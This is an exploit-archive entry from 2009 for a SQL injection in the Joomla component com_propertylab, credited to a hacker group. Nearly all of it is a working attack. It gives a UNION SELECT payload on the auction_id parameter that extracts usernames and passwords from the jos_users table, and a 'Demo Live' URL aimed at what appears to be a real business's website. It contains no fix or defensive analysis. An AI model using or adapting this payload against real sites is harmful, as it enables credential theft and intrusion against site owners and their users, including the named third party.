Joomla Component com_propertylab (auction_id) SQL injection Vuln

2009-07-10T00:00:00
ID 1337DAY-ID-5475
Type zdt
Reporter Chip D3 Bi0s
Modified 2009-07-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Joomla Component com_propertylab (auction_id) SQL injection Vuln
================================================================


--------------------------------------------------------------------------
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
--------------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################


Example:

http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>

<Sql Code>:
+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
 

Demo Live (1):

http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users



#  0day.today [2018-03-14]  #